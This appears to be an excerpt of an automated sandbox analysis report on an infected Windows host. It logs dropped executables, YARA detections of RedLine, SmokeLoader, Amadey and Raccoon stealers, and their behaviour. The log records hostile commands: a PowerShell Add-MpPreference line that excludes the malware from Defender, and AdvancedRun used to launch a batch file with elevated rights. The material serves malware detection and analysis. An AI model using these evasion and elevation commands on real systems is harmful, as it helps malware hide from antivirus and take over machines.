Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Process created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Process created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\irjbuft Process created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Code function: 27_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 27_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 22_2_6A94E730
Source: explorer.exe, 00000004.00000000.269132746.0000000001400000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000004.00000000.287776975.0000000005F40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.269132746.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.269132746.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.296208877.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000004.00000000.304691629.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\B82B.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\C1B2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DF9C.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\EA8A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00410B13 cpuid 29_2_00410B13
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 1_2_00422F80 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_00422F80
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_0041F061 _free,_free,_free,GetTimeZoneInformation,_free, 29_2_0041F061
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree, 29_2_00401F20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 22_2_6A944020

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 00000027.00000000.491819153.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.500851808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.495421124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.494034054.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.568880871.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 22.2.CD0D.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.1.irjbuft.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.CD0D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.irjbuft.2bf15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.1.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.6EC5.exe.2c315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.irjbuft.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.CD0D.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.25Kf6vSBoq.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 00000027.00000000.491819153.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.500851808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.495421124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.494034054.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.568880871.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 22.2.CD0D.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.1.irjbuft.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.CD0D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.irjbuft.2bf15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.1.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.6EC5.exe.2c315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.irjbuft.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.CD0D.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.25Kf6vSBoq.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs